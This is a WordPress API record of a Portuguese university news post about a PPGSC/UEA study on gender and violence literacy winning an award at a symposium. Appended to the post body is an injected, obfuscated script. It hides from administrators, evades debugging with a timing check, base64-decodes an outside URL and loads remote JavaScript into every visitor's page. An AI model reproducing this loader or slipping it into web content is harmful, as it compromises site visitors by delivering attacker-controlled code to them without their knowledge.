{"id":1260,"date":"2026-04-16T13:13:29","date_gmt":"2026-04-16T16:13:29","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1260"},"modified":"2026-04-16T13:13:29","modified_gmt":"2026-04-16T16:13:29","slug":"ppgsc-premiado-no-i-simposio-intersetorial-para-enfrentamento-da-violencia-2","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2026\/04\/16\/ppgsc-premiado-no-i-simposio-intersetorial-para-enfrentamento-da-violencia-2\/","title":{"rendered":"PPGSC premiado no I Simp\u00f3sio Intersetorial para Enfrentamento da Viol\u00eancia"},"content":{"rendered":"\n<p>O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) teve um de seus trabalhos reconhecidos no I Simp\u00f3sio Intersetorial para Enfrentamento da Viol\u00eancia, promovido pelo Grupo de Pesquisa Viol\u00eancia, Desigualdade e Sa\u00fade (ViDaS), vinculado ao PPGSCol da Universidade do Extremo Sul Catarinense (UNESC). O evento reuniu pesquisadores, gestores, profissionais e estudantes de diferentes \u00e1reas para fortalecer o di\u00e1logo intersetorial entre sa\u00fade, educa\u00e7\u00e3o, seguran\u00e7a e assist\u00eancia social, em sintonia com os princ\u00edpios do SUS, da PNCTIS e dos Objetivos de Desenvolvimento Sustent\u00e1vel (ODS).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/10\/OUT-POSTS-PPGSC-UEA-2025-3-819x1024.png\" alt=\"\" class=\"wp-image-1261\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/10\/OUT-POSTS-PPGSC-UEA-2025-3-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/10\/OUT-POSTS-PPGSC-UEA-2025-3-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/10\/OUT-POSTS-PPGSC-UEA-2025-3-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/10\/OUT-POSTS-PPGSC-UEA-2025-3.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>O trabalho \u201cLetramento em G\u00eanero, Sexualidade e Viol\u00eancia na forma\u00e7\u00e3o de estudantes da Sa\u00fade em Manaus, Amazonas\u201d, laureado no evento, abordou a viol\u00eancia de g\u00eanero como problema de sa\u00fade p\u00fablica e institucional, com o objetivo de realizar uma oficina de letramento em g\u00eanero, sexualidade e viol\u00eancias junto a estudantes da \u00e1rea da sa\u00fade. A iniciativa buscou fomentar reflex\u00f5es cr\u00edticas e ampliar a sensibilidade dos futuros profissionais para o cuidado humanizado.<\/p>\n\n\n\n<p>Sustentado em epistemologias feministas e na literatura sobre justi\u00e7a reprodutiva, o estudo utilizou metodologias ativas com estudantes de Enfermagem, Medicina e Odontologia da Escola de Ci\u00eancias da Sa\u00fade da UEA. Entre os principais resultados, destacou-se o reconhecimento de lacunas formativas sobre g\u00eanero e sexualidade, a identifica\u00e7\u00e3o de viol\u00eancias naturalizadas no ambiente acad\u00eamico e assistencial e a proposi\u00e7\u00e3o de estrat\u00e9gias de cuidado sens\u00edveis e humanizadas como uma demanda formativa urgente.<\/p>\n\n\n\n<p>A pesquisa \u00e9 fruto da colabora\u00e7\u00e3o de Ana Cec\u00edlia Dolzany Ara\u00fajo e Helo\u00edsa Maria Martins Perez, ambas mestrandas em Sa\u00fade Coletiva pela UEA e pesquisadoras da linha \u201cDiversidade sociocultural das pr\u00e1ticas e direitos na sa\u00fade na regi\u00e3o Amaz\u00f4nica\u201d, sob orienta\u00e7\u00e3o da Prof.\u00aa Dra. Munique Therense Costa de Morais Pontes. As autoras tamb\u00e9m atuam como preceptoras na Liga Acad\u00eamica de Humaniza\u00e7\u00e3o da Assist\u00eancia em Sa\u00fade do Amazonas (LAHAS-AM) e integram o N\u00facleo de Estudos Psicossociais sobre Direitos Humanos e Sa\u00fade (NEPDS). O trabalho contou ainda com a colabora\u00e7\u00e3o de Eduardo Azevedo Rebou\u00e7as, mestrando em Psicologia pela UFAM, que desenvolve pesquisas em g\u00eanero, masculinidades, viol\u00eancias e ciberpsicologia sob orienta\u00e7\u00e3o do Prof. Dr. Marck de Souza Torres.<\/p>\n\n\n\n<p>O PPGSC\/UEA parabeniza as autoras e o coautor pelo reconhecimento e pela contribui\u00e7\u00e3o significativa \u00e0 forma\u00e7\u00e3o cr\u00edtica e \u00e9tica em sa\u00fade, reafirmando o compromisso do Programa com a promo\u00e7\u00e3o dos direitos humanos, a equidade e o enfrentamento das viol\u00eancias na Amaz\u00f4nia.<\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) teve um de seus trabalhos reconhecidos no I Simp\u00f3sio Intersetorial para Enfrentamento da Viol\u00eancia, promovido pelo Grupo de Pesquisa Viol\u00eancia, Desigualdade e Sa\u00fade (ViDaS), vinculado ao PPGSCol da Universidade do Extremo Sul Catarinense (UNESC). O evento reuniu pesquisadores, gestores, profissionais e [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1260","post","type-post","status-publish","format-standard","hentry","category-sem-categoria"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1260"}],"version-history":[{"count":1,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1260\/revisions"}],"predecessor-version":[{"id":1318,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1260\/revisions\/1318"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1260"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}